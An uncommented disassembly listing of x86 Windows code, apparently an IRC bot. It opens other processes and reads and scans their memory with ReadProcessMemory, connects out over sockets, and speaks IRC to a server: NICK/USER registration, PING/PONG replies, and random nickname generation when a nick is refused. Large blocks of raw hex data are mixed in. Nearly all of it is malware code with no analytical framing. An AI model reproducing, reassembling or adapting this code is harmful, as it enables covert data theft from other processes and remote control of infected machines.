dd 511C244Ch, 106A5550h, 2C244489h, 0A96015FFh, 0C085004Dh
dd 448B7E75h, 0E8C11C24h, 24448904h, 33717418h, 0C13B41C9h
dd 4C89DD8Bh, 64721024h, 87B8366h, 6A507505h, 0FF006A00h
dd 4DB16815h, 57F88B00h, 73FF016Ah, 6C15FF04h, 85004DB1h
dd 8B2575C0h, 44896047h, 878D2024h, 80h, 436F6C68h, 13E85000h
dd 5900006Fh, 55C2E850h, 0C0850000h, 34755959h, 774FF85h
dd 7015FF57h, 8B004DB1h, 83182444h, 44FF10C3h, 44391024h
dd 9C761024h, 6A55FF33h, 50D6FF00h, 0B0E015FFh, 0C78B0042h
dd 5B5D5E5Fh, 0C318C483h, 18246483h, 247C8300h, 5D760020h
dd 80878Dh, 44890000h, 44811024h, 11C1024h, 64680000h
dd 0FF00436Fh, 0E8142474h, 6EA6h, 55E85059h, 85000055h
dd 755959C0h, 6F5C6844h, 74FF0043h, 8BE81424h, 5900006Eh
dd 553AE850h, 0C0850000h, 7755959h, 8904438Bh, 0FF242444h
dd 8B182444h, 3B182444h, 72202444h, 74FF85ADh, 15FF5707h
dd 4DB170h, 24247C8Bh, 0FFFF6DE9h, 0E9C033FFh, 0FFFFFF74h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 68h
push esi
push dword ptr [ebp+8]
xor esi, esi
push esi
push 410h
mov [ebp-14h], esi
call ds:dword_42B040 ; OpenProcess
cmp eax, esi
mov [ebp-8], eax
jnz short loc_419BB5
xor eax, eax
jmp loc_419D27
; ---------------------------------------------------------------------------
loc_419BB5: ; CODE XREF: seg000:00419BAC�j
mov eax, [ebp+0Ch]
push ebx
mov [eax], esi
push edi
lea eax, [ebp-68h]
push eax
call ds:dword_42B0F4 ; GetSystemInfo
push dword ptr [ebp-64h]
mov [ebp-0Ch], esi
mov esi, ds:dword_42B0E8
push 8
call esi ; GetProcessHeap
mov edi, ds:dword_42B0E4
push eax
call edi ; RtlAllocateHeap
mov ebx, ds:dword_42B0F0
lea ecx, [ebp-0Ch]
push ecx
push dword ptr [ebp-64h]
mov [ebp-4], eax
push eax
push 7FFDF000h
push dword ptr [ebp-8]
call ebx ; ReadProcessMemory
test eax, eax
jnz short loc_419C05
xor esi, esi
jmp loc_419D1A
; ---------------------------------------------------------------------------
loc_419C05: ; CODE XREF: seg000:00419BFC�j
push 1Ch
lea eax, [ebp-44h]
push eax
mov eax, [ebp-4]
push dword ptr [eax+18h]
push dword ptr [ebp-8]
call ds:dword_42B0EC ; VirtualQueryEx
test eax, eax
jz loc_419D09
test byte ptr [ebp-33h], 10h
jz loc_419D09
test byte ptr [ebp-2Fh], 1
jnz loc_419D09
push dword ptr [ebp-38h]
push 8
call esi ; GetProcessHeap
push eax
call edi ; RtlAllocateHeap
mov edi, eax
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-38h]
mov eax, [ebp-4]
push edi
push dword ptr [eax+18h]
mov [ebp-10h], edi
push dword ptr [ebp-8]
call ebx ; ReadProcessMemory
test eax, eax
jz loc_419D09
loc_419C60: ; CODE XREF: seg000:00419C94�j
push edi
push offset dword_4DA160
call sub_4298E2
test eax, eax
pop ecx
pop ecx
jnz short loc_419C88
lea eax, [edi+200h]
push eax
push offset dword_4DA968
call sub_4298E2
test eax, eax
pop ecx
pop ecx
jz short loc_419C98
loc_419C88: ; CODE XREF: seg000:00419C6F�j
mov eax, [ebp-38h]
mov ecx, [ebp-10h]
inc edi
inc edi
add eax, ecx
cmp edi, eax
jb short loc_419C60
jmp short loc_419D09
; ---------------------------------------------------------------------------
loc_419C98: ; CODE XREF: seg000:00419C86�j
test edi, edi
jz short loc_419D09
lea eax, [ebp-18h]
push eax
lea eax, [edi+410h]
push eax
call ds:dword_42B0AC ; FileTimeToLocalFileTime
test eax, eax
jz short loc_419CD5
lea eax, [ebp-28h]
push eax
lea eax, [ebp-18h]
push eax
call ds:dword_42B0A8 ; FileTimeToSystemTime
test eax, eax
jz short loc_419CD5
mov ecx, [ebp+0Ch]
xor eax, eax
mov al, [edi+42Ch]
shr eax, 1
and eax, 7Fh
mov [ecx], eax
loc_419CD5: ; CODE XREF: seg000:00419CAF�j
; seg000:00419CC1�j
movzx eax, byte ptr [edi+42Dh]
mov ds:dword_4DB180, eax
mov eax, [ebp-4]
mov eax, [eax+18h]
sub eax, [ebp-10h]
mov dword ptr [ebp-14h], 1
lea eax, [eax+edi+434h]
add edi, 434h
mov ds:dword_4DB178, eax
mov ds:dword_4DB17C, edi
loc_419D09: ; CODE XREF: seg000:00419C1C�j
; seg000:00419C26�j ...
push dword ptr [ebp-4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
mov esi, [ebp-14h]
loc_419D1A: ; CODE XREF: seg000:00419C00�j
push dword ptr [ebp-8]
call ds:dword_42B004 ; CloseHandle
pop edi
mov eax, esi
pop ebx
loc_419D27: ; CODE XREF: seg000:00419BB0�j
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 50h
push dword ptr [ebp+8]
push 0
push 410h
call ds:dword_42B040 ; OpenProcess
test eax, eax
mov [ebp-4], eax
jnz short loc_419D49
leave
retn
; ---------------------------------------------------------------------------
loc_419D49: ; CODE XREF: seg000:00419D45�j
mov eax, [ebp+0Ch]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp-50h]
push eax
call ds:dword_42B0F4 ; GetSystemInfo
mov eax, [ebp-44h]
mov ebx, [ebp-48h]
cmp ebx, eax
mov [ebp-10h], eax
jnb loc_419E09
mov edi, ds:dword_42B0E8
loc_419D73: ; CODE XREF: seg000:00419E03�j
push 1Ch
lea eax, [ebp-2Ch]
push eax
push ebx
push dword ptr [ebp-4]
call ds:dword_42B0EC ; VirtualQueryEx
test eax, eax
jz short loc_419DF7
test byte ptr [ebp-1Bh], 10h
mov eax, [ebp-20h]
mov [ebp-8], eax
jz short loc_419DFD
test byte ptr [ebp-17h], 1
jnz short loc_419DFD
push eax
push 8
call edi ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
and dword ptr [ebp-0Ch], 0
mov esi, eax
lea eax, [ebp-0Ch]
push eax
push dword ptr [ebp-20h]
push esi
push ebx
push dword ptr [ebp-4]
call ds:dword_42B0F0 ; ReadProcessMemory
test eax, eax
jz short loc_419DE9
push offset dword_4DA160
push esi
call sub_4298E2
test eax, eax
pop ecx
pop ecx
jnz short loc_419DE9
lea eax, [esi+400h]
push offset dword_4DA968
push eax
call sub_4298E2
test eax, eax
pop ecx
pop ecx
jz short loc_419E1B
loc_419DE9: ; CODE XREF: seg000:00419DBF�j
; seg000:00419DD0�j
push esi
push 0
call edi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
jmp short loc_419DFD
; ---------------------------------------------------------------------------
loc_419DF7: ; CODE XREF: seg000:00419D85�j
mov eax, [ebp-4Ch]
mov [ebp-8], eax
loc_419DFD: ; CODE XREF: seg000:00419D91�j
; seg000:00419D97�j ...
add ebx, [ebp-8]
cmp ebx, [ebp-10h]
jb loc_419D73
loc_419E09: ; CODE XREF: seg000:00419D67�j
xor esi, esi
loc_419E0B: ; CODE XREF: seg000:00419E4D�j
push dword ptr [ebp-4]
call ds:dword_42B004 ; CloseHandle
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419E1B: ; CODE XREF: seg000:00419DE7�j
add ebx, 800h
lea eax, [esi+800h]
xor ecx, ecx
mov ds:dword_4DB178, ebx
mov ds:dword_4DB17C, eax
cmp [eax], cl
jnz short loc_419E3D
cmp [eax+1], cl
jz short loc_419E45
loc_419E3D: ; CODE XREF: seg000:00419E36�j
; seg000:00419E43�j
inc ecx
inc eax
inc eax
cmp byte ptr [eax], 0
jnz short loc_419E3D
loc_419E45: ; CODE XREF: seg000:00419E3B�j
mov eax, [ebp+0Ch]
xor esi, esi
mov [eax], ecx
inc esi
jmp short loc_419E0B
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, ds:dword_4DB174
add eax, eax
mov [ebp-8], ax
add eax, 2
push esi
mov esi, ds:dword_42B0E8
mov [ebp-6], ax
movzx eax, ax
push edi
push eax
push 8
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
mov ecx, ds:dword_4DB174
add ecx, ecx
push ecx
push ds:dword_4DB17C
mov [ebp-4], eax
push eax
call sub_41F400
add esp, 0Ch
lea eax, [ebp-8]
push eax
xor eax, eax
mov al, byte ptr ds:dword_4DB180
push eax
call ds:dword_4DA964
push dword ptr [ebp-4]
mov edi, offset dword_4DB188
push offset dword_4DA160
push offset dword_4DA968
push dword ptr [ebp+8]
push offset dword_436F78
push 200h
push edi
call sub_41E6FE
add esp, 1Ch
push dword ptr [ebp-4]
push 0
call esi ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
mov eax, edi
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_4DB174
add eax, eax
push ebx
mov [ebp-18h], ax
add eax, 2
push esi
mov [ebp-16h], ax
movzx eax, ax
push edi
push eax
push 8
call ds:dword_42B0E8 ; GetProcessHeap
push eax
call ds:dword_42B0E4 ; RtlAllocateHeap
and dword ptr [ebp-0Ch], 0
mov [ebp-14h], eax
mov ebx, offset dword_4DA968
mov edi, 200h
mov esi, offset dword_4DB388
loc_419F2A: ; CODE XREF: seg000:00419FDE�j
mov eax, ds:dword_4DB174
add eax, eax
push eax
push ds:dword_4DB17C
push dword ptr [ebp-14h]
call sub_41F400
add esp, 0Ch
lea eax, [ebp-18h]
push eax
push dword ptr [ebp-0Ch]
call ds:dword_4DA964
mov eax, ds:dword_4DB174
and dword ptr [ebp-10h], 0
test eax, eax
mov ecx, [ebp-14h]
mov dword ptr [ebp-8], 1
jbe short loc_419F9F
loc_419F67: ; CODE XREF: seg000:00419F97�j
cmp dword ptr [ebp-8], 0
jz short loc_419FBC
mov dl, [ecx]
test dl, dl
mov [ebp-1], dl
jz short loc_419F8B
cmp byte ptr [ecx+1], 0
jnz short loc_419F8B
cmp dl, 20h
jnb short loc_419F85
and dword ptr [ebp-8], 0
loc_419F85: ; CODE XREF: seg000:00419F7F�j
cmp byte ptr [ebp-1], 7Eh
jbe short loc_419F8F
loc_419F8B: ; CODE XREF: seg000:00419F74�j
; seg000:00419F7A�j
and dword ptr [ebp-8], 0
loc_419F8F: ; CODE XREF: seg000:00419F89�j
inc ecx
inc ecx
inc dword ptr [ebp-10h]
cmp [ebp-10h], eax
jb short loc_419F67
cmp dword ptr [ebp-8], 0
jz short loc_419FBC
loc_419F9F: ; CODE XREF: seg000:00419F65�j
push dword ptr [ebp-14h]
push offset dword_4DA160
push ebx
push dword ptr [ebp+8]
push offset dword_436F78
push edi
push esi
call sub_41E6FE
add esp, 1Ch
jmp short loc_419FD4
; ---------------------------------------------------------------------------
loc_419FBC: ; CODE XREF: seg000:00419F6B�j
; seg000:00419F9D�j
push offset dword_4DA160
push ebx
push dword ptr [ebp+8]
push offset dword_436FC8
push edi
push esi
call sub_41E6FE
add esp, 18h
loc_419FD4: ; CODE XREF: seg000:00419FBA�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 0FFh
jbe loc_419F2A
push dword ptr [ebp-14h]
push 0
call ds:dword_42B0E8 ; GetProcessHeap
push eax
call ds:dword_42B0E0 ; RtlFreeHeap
pop edi
mov eax, esi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
byte_419FFD db 55h, 8Dh, 6Ch ; DATA XREF: sub_40274D+1AE3�o
dd 0EC818C24h, 29Ch, 537C458Bh, 256A5756h, 8DF08B59h, 0A5F3D87Dh
dd 8946F633h, 90B0h, 3625E800h, 0C63B0000h, 74704589h
dd 2F8830Fh, 0F0680A74h, 0E9004371h, 13Dh, 71DC6856h, 92E80043h
dd 85000023h, 0F5959C0h, 12384h, 71D06800h, 15FF0043h
dd 42B018h, 0B020358Bh, 0F88B0042h, 4371B468h, 7D895700h
dd 68D6FF6Ch, 437198h, 0A960A357h, 0D6FF004Dh, 43717868h
dd 68A35700h, 0FF004DB1h, 715C68D6h, 0A3570043h, 4DB16Ch
dd 4068D6FFh, 57004371h, 4DB170A3h, 0A3D6FF00h, 4DA964h
dd 0FFF956E8h, 89C085FFh, 840F7C45h, 90h, 0B0FC358Bh, 0BF0042h
dd 57000004h, 4DA160BBh, 2C685300h, 0FF004371h, 68BF57D6h
dd 57004DA9h, 43711468h, 83D6FF00h, 6801707Dh, 4DB174h
dd 757C75FFh, 0FA9AE807h, 5EBFFFFh, 0FFFC31E8h, 59C085FFh
dd 83427459h, 4DB1743Dh, 20750000h, 75FF5753h, 0D8858D7Ch
dd 68FFFFFDh, 4370B8h, 20068h, 0DBE85000h, 83000045h, 33EB18C4h
dd 1707D83h, 757C75FFh, 0FD19E807h, 5EBFFFFh, 0FFFDA9E8h
dd 0EB5059FFh, 707C680Ch, 5EB0043h, 43705068h, 0D8858D00h
dd 50FFFFFDh, 454DE8h, 6A595900h, 71DC6800h, 72E80043h
dd 59000022h, 6C75FF59h, 0B0F815FFh, 13EB0042h, 43701C68h
dd 0D8858D00h, 50FFFFFDh, 4521E8h, 33595900h, 647539F6h
dd 0FF561A75h, 858D6075h, 0FFFFFDD8h, 0DC458D50h, 0D875FF50h
dd 0FE7096E8h, 14C483FFh, 0FDD8858Dh, 0E850FFFFh, 0FFFFDBBCh
dd 0E85C75FFh, 0FFFF0F8Dh, 0FF565959h, 42B06815h
db 0, 0CCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A1C6 proc near ; CODE XREF: seg000:0041A7D2�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0
push 1
push 2
call ds:dword_444100 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_41A242
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
push [ebp+arg_4]
mov [ebp+var_10], 2
call ds:dword_444260 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call ds:dword_44417C ; inet_addr
cmp eax, esi
jnz short loc_41A227
push [ebp+arg_0]
call ds:dword_444168 ; gethostbyname
test eax, eax
jz short loc_41A242
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_41A227: ; CODE XREF: sub_41A1C6+4B�j
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+var_10]
push eax
push edi
call ds:dword_4440AC ; connect
cmp eax, esi
jnz short loc_41A246
push edi
call ds:dword_444218 ; closesocket
loc_41A242: ; CODE XREF: sub_41A1C6+1B�j
; sub_41A1C6+58�j
mov eax, esi
jmp short loc_41A248
; ---------------------------------------------------------------------------
loc_41A246: ; CODE XREF: sub_41A1C6+73�j
mov eax, edi
loc_41A248: ; CODE XREF: sub_41A1C6+7E�j
pop edi
pop esi
leave
retn
sub_41A1C6 endp
; =============== S U B R O U T I N E =======================================
sub_41A24C proc near ; CODE XREF: sub_40274D+305E�p
; sub_40274D+30C1�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push offset asc_42CC64 ; "\n"
push edi
call sub_41EED0
pop ecx
pop ecx
mov esi, offset dword_4DB58C
loc_41A264: ; CODE XREF: sub_41A24C+42�j
cmp dword ptr [esi-4], 1
jnz short loc_41A282
cmp dword ptr [esi], 0
jbe short loc_41A282
push 0
push edi
call sub_41E1C0
pop ecx
push eax
push edi
push dword ptr [esi]
call ds:dword_4441A0 ; send
loc_41A282: ; CODE XREF: sub_41A24C+1C�j
; sub_41A24C+21�j
add esi, 210h
cmp esi, offset dword_4E1CAC
jl short loc_41A264
pop edi
pop esi
retn
sub_41A24C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A293 proc near ; CODE XREF: sub_40274D+34C1�p
; sub_40274D+3504�p ...
var_3C = byte ptr -3Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3Ch
push 14h
lea eax, [ebp+var_28]
push 0
push eax
call sub_41E5F0
add esp, 0Ch
call sub_41ECDE
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul ds:dbl_437988
call sub_41FE38
cmp eax, 1
jnz short loc_41A2DD
call sub_41ECDE
call sub_41ECDE
push 66h
cdq
pop ecx
idiv ecx
push ds:off_4431D8[edx*4]
jmp short loc_41A2F6
; ---------------------------------------------------------------------------
loc_41A2DD: ; CODE XREF: sub_41A293+2F�j
call sub_41ECDE
call sub_41ECDE
cdq
mov ecx, 0C0h
idiv ecx
push ds:off_442ED8[edx*4]
loc_41A2F6: ; CODE XREF: sub_41A293+48�j
lea eax, [ebp+var_28]
push eax
call sub_41EEC0
pop ecx
pop ecx
push ebx
push esi
lea eax, [ebp+var_28]
push edi
push eax
call sub_41E1C0
pop ecx
mov esi, eax
push 13h
pop ebx
mov [ebp+var_4], esi
sub ebx, esi
call sub_41ECDE
mov [ebp+var_C], eax
fild [ebp+var_C]
fmul ds:dbl_437980
call sub_41FE38
mov [ebp+var_14], eax
call sub_41ECDE
mov [ebp+var_C], eax
fild [ebp+var_C]
fimul [ebp+var_4]
fmul ds:dbl_437978
call sub_41FE38
cmp esi, 2
mov edi, offset a__1 ; "-|`_\\{[]}"
jle short loc_41A368
cmp esi, 3
jnz short loc_41A35F
cmp [ebp+var_14], 1
jz short loc_41A368
loc_41A35F: ; CODE XREF: sub_41A293+C4�j
cmp eax, 1
jnz loc_41A42B
loc_41A368: ; CODE XREF: sub_41A293+BF�j
; sub_41A293+CA�j
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437960
call sub_41FE38
push ds:off_4431D8[eax*4]
lea eax, [ebp+var_3C]
push eax
call sub_41EEC0
lea eax, [ebp+esi+var_28]
mov [ebp+var_C], eax
movsx eax, byte ptr [eax-1]
push eax
push edi
call sub_41EFD0
add esp, 10h
test eax, eax
jnz short loc_41A41A
movsx eax, [ebp+var_3C]
push eax
push edi
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jnz short loc_41A41A
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
dec esi
mov [ebp+var_14], esi
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437978
call sub_41FE38
cmp eax, 1
jnz short loc_41A41A
push edi
call sub_41E1C0
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A3F3
fadd ds:dbl_433088
loc_41A3F3: ; CODE XREF: sub_41A293+158�j
fstp qword ptr [ebp-8]
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-8]
fmul ds:dbl_437978
call sub_41FE38
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov ecx, [ebp+var_C]
mov [ecx], al
loc_41A41A: ; CODE XREF: sub_41A293+112�j
; sub_41A293+123�j ...
push ebx
lea eax, [ebp+var_3C]
push eax
lea eax, [ebp+var_28]
push eax
call sub_41F2C0
add esp, 0Ch
loc_41A42B: ; CODE XREF: sub_41A293+CF�j
lea eax, [ebp+var_28]
push eax
call sub_41E1C0
mov esi, eax
lea ebx, [ebp+esi+var_28]
movsx eax, byte ptr [ebx-1]
push eax
mov [ebp+var_4], esi
call sub_420AD5
test eax, eax
pop ecx
pop ecx
jnz loc_41A695
and [ebp+var_C], eax
movsx eax, byte ptr [ebx-1]
push eax
push edi
call sub_41EFD0
test eax, eax
pop ecx
pop ecx
jnz loc_41A595
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
lea eax, [esi+3]
mov [ebp+var_14], eax
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437978
call sub_41FE38
cmp esi, 3
jz short loc_41A498
cmp eax, 1
jnz loc_41A595
loc_41A498: ; CODE XREF: sub_41A293+1FA�j
push 2
cdq
pop ecx
idiv ecx
cmp edx, 1
jnz short loc_41A4E0
push edi
call sub_41E1C0
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A4BA
fadd ds:dbl_433088
loc_41A4BA: ; CODE XREF: sub_41A293+21F�j
fstp qword ptr [ebp-10h]
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-10h]
fmul ds:dbl_437978
call sub_41FE38
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov [ebx], al
jmp short loc_41A4FC
; ---------------------------------------------------------------------------
loc_41A4E0: ; CODE XREF: sub_41A293+20E�j
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437958
call sub_41FE38
mov cl, 41h
sub cl, al
mov [ebx], cl
loc_41A4FC: ; CODE XREF: sub_41A293+24B�j
xor ebx, ebx
inc esi
inc ebx
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437950
call sub_41FE38
cmp esi, 3
jz short loc_41A525
cmp eax, ebx
jnz short loc_41A595
loc_41A525: ; CODE XREF: sub_41A293+28C�j
push 2
pop ebx
cdq
mov ecx, ebx
idiv ecx
test edx, edx
jnz short loc_41A570
push edi
call sub_41E1C0
test eax, eax
mov [ebp+var_14], eax
fild [ebp+var_14]
pop ecx
jge short loc_41A548
fadd ds:dbl_433088
loc_41A548: ; CODE XREF: sub_41A293+2AD�j
fstp qword ptr [ebp-10h]
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul qword ptr [ebp-10h]
fmul ds:dbl_437978
call sub_41FE38
mov al, byte ptr ds:a__1[eax] ; "-|`_\\{[]}"
mov [ebp+esi+var_28], al
jmp short loc_41A58E
; ---------------------------------------------------------------------------
loc_41A570: ; CODE XREF: sub_41A293+29C�j
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437958
call sub_41FE38
mov cl, 41h
sub cl, al
mov [ebp+esi+var_28], cl
loc_41A58E: ; CODE XREF: sub_41A293+2DB�j
inc esi
mov [ebp+var_4], esi
mov [ebp+var_C], ebx
loc_41A595: ; CODE XREF: sub_41A293+1D0�j
; sub_41A293+1FF�j ...
cmp esi, 6
jge short loc_41A615
call sub_41ECDE
cmp esi, 5
jge short loc_41A5B2
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437980
jmp short loc_41A5CB
; ---------------------------------------------------------------------------
loc_41A5B2: ; CODE XREF: sub_41A293+30F�j
mov [ebp+var_14], eax
fild [ebp+var_14]
push 8
pop eax
sub eax, esi
mov [ebp+var_14], eax
fild [ebp+var_14]
fmulp st(1), st
fmul ds:dbl_437978
loc_41A5CB: ; CODE XREF: sub_41A293+31D�j
call sub_41FE38
test eax, eax
jnz short loc_41A5EE
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437948
call sub_41FE38
mov cl, 30h
jmp short loc_41A60B
; ---------------------------------------------------------------------------
loc_41A5EE: ; CODE XREF: sub_41A293+33F�j
cmp eax, 1
jnz short loc_41A615
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437958
call sub_41FE38
mov cl, 41h
loc_41A60B: ; CODE XREF: sub_41A293+359�j
sub cl, al
mov [ebp+esi+var_28], cl
inc esi
mov [ebp+var_4], esi
loc_41A615: ; CODE XREF: sub_41A293+305�j
; sub_41A293+35E�j
cmp [ebp+var_C], 2
jge short loc_41A695
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fimul [ebp+var_4]
fmul ds:dbl_437978
call sub_41FE38
cmp eax, 1
jnz short loc_41A695
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437948
call sub_41FE38
mov cl, 30h
sub cl, al
mov [ebp+esi+var_28], cl
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437940
call sub_41FE38
cmp eax, 1
jnz short loc_41A695
cmp [ebp+var_C], eax
jge short loc_41A695
call sub_41ECDE
mov [ebp+var_14], eax
fild [ebp+var_14]
fmul ds:dbl_437938
call sub_41FE38
mov cl, 30h
sub cl, al
mov [ebp+esi+var_27], cl
loc_41A695: ; CODE XREF: sub_41A293+1B8�j
; sub_41A293+386�j ...
push 14h
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_41E860
mov eax, [ebp+arg_0]
add esp, 0Ch
pop edi
pop esi
pop ebx
leave
retn
sub_41A293 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41A6AE proc near ; CODE XREF: seg000:0041A8D8�p
var_420 = byte ptr -420h
var_220 = byte ptr -220h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 420h
push ebx
push esi
push edi
mov esi, offset asc_42FCE0 ; " "
push esi
push [ebp+arg_0]
call sub_41E7B2
xor edi, edi
pop ecx
inc edi
pop ecx
mov [ebp+var_20], eax
xor ebx, ebx
loc_41A6D2: ; CODE XREF: sub_41A6AE+35�j
push esi
push ebx
call sub_41E7B2
mov [ebp+edi*4+var_20], eax
inc edi
cmp edi, 8
pop ecx
pop ecx
jl short loc_41A6D2
cmp [ebp+var_20], ebx
mov esi, [ebp+var_1C]
jnz short loc_41A6F9
cmp esi, ebx
jnz short loc_41A6F9
xor eax, eax
inc eax
jmp loc_41A79E
; ---------------------------------------------------------------------------
loc_41A6F9: ; CODE XREF: sub_41A6AE+3D�j
; sub_41A6AE+41�j
push [ebp+var_20]
push offset aPing ; "PING"
call sub_41E990
test eax, eax
pop ecx
pop ecx
push esi
jnz short loc_41A723
lea eax, [ebp+var_220]
push offset aPongS_0 ; "PONG %s\n"
push eax
call sub_41E6A6
add esp, 0Ch
jmp short loc_41A77D
; ---------------------------------------------------------------------------
loc_41A723: ; CODE XREF: sub_41A6AE+5D�j
push offset a433 ; "433"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_41A744
push esi
push offset a432 ; "432"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_41A79C
loc_41A744: ; CODE XREF: sub_41A6AE+83�j
push 200h
lea eax, [ebp+var_420]
push ebx
push eax
call sub_41E5F0
lea eax, [ebp+var_420]
push eax
call sub_41A293
lea eax, [ebp+var_420]
push eax
lea eax, [ebp+var_220]
push offset aNickS_1 ; "NICK %s\n"
push eax
call sub_41E6A6
add esp, 1Ch
loc_41A77D: ; CODE XREF: sub_41A6AE+73�j
lea eax, [ebp+var_220]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
call ds:dword_4441A0 ; send
loc_41A79C: ; CODE XREF: sub_41A6AE+94�j
xor eax, eax
loc_41A79E: ; CODE XREF: sub_41A6AE+46�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A6AE endp
; ---------------------------------------------------------------------------
loc_41A7A3: ; DATA XREF: sub_41A954+57�o
push ebp
mov ebp, esp
mov eax, 4008h
call sub_41EA20
push ebx
push esi
mov esi, [ebp+8]
imul esi, 210h
push edi
push ds:dword_4DB794[esi]
xor edi, edi
lea eax, dword_4DB594[esi]
inc edi
push eax
mov ds:dword_4DB588[esi], edi
call sub_41A1C6
pop ecx
xor ebx, ebx
cmp eax, edi
pop ecx
mov ds:dword_4DB58C[esi], eax
jb loc_41A934
mov edi, 1000h
push edi
lea eax, [ebp-2008h]
push ebx
push eax
call sub_41E5F0
lea eax, [ebp-2008h]
push eax
call sub_41A293
lea eax, [ebp-4008h]
push eax
call sub_41A293
lea eax, [ebp-3008h]
push eax
call sub_41A293
lea eax, [ebp-3008h]
push eax
lea eax, [ebp-4008h]
push eax
lea eax, [ebp-2008h]
push eax
lea eax, [ebp-1008h]
push offset aNickSUserSHotm ; "NICK %s\nUSER %s \"hotmail.com\" \"127.0.0."...
push eax
call sub_41E6A6
add esp, 2Ch
lea eax, [ebp-1008h]
push ebx
push eax
call sub_41E1C0
pop ecx
push eax
lea eax, [ebp-1008h]
push eax
push ds:dword_4DB58C[esi]
call ds:dword_4441A0 ; send
push edi
lea eax, [ebp-1008h]
push ebx
push eax
call sub_41E5F0
push edi
lea eax, [ebp-1008h]
push ebx
push eax
call sub_41E5F0
add esp, 18h
jmp loc_41A914
; ---------------------------------------------------------------------------
loc_41A88F: ; CODE XREF: seg000:0041A92E�j
xor eax, eax
cmp [ebp-4], ebx
jmp short loc_41A8FE
; ---------------------------------------------------------------------------
loc_41A896: ; CODE XREF: seg000:0041A901�j
mov al, [ebp+eax-1008h]
cmp al, 0Dh
jz short loc_41A8BD
cmp al, 0Ah
jz short loc_41A8BD
cmp dword ptr [ebp+8], 0FA0h
jz short loc_41A8BD
mov ecx, [ebp+8]
inc dword ptr [ebp+8]
mov [ebp+ecx-2008h], al
jmp short loc_41A8F7
; ---------------------------------------------------------------------------
loc_41A8BD: ; CODE XREF: seg000:0041A89F�j
; seg000:0041A8A3�j ...
mov eax, [ebp+8]
cmp eax, ebx
jz short loc_41A8F7
push ds:dword_4DB58C[esi]
mov [ebp+eax-2008h], bl
lea eax, [ebp-2008h]
push eax
call sub_41A6AE
test eax, eax
